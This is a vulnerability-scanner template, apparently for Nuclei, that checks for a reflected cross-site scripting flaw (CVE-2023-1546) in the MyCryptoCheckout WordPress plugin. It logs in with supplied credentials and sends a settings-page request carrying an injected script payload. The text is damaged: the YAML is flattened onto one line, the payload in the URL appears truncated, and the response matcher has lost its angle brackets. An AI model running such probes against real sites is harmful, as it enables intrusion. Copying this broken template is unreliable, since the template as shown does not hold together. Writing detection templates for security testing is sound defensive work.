id: CVE-2023-1546 info: name: MyCryptoCheckout < 2.124 - Cross-Site Scripting author: Harsh severity: medium description: | The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 - https://nvd.nist.gov/vuln/detail/CVE-2023-1546 classification: cve-id: CVE-2023-1546 metadata: max-request: 2 verified: true tags: cve,cve2023,Wordpress,wp,wp-plugin,xss,wpscan,authenticated http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and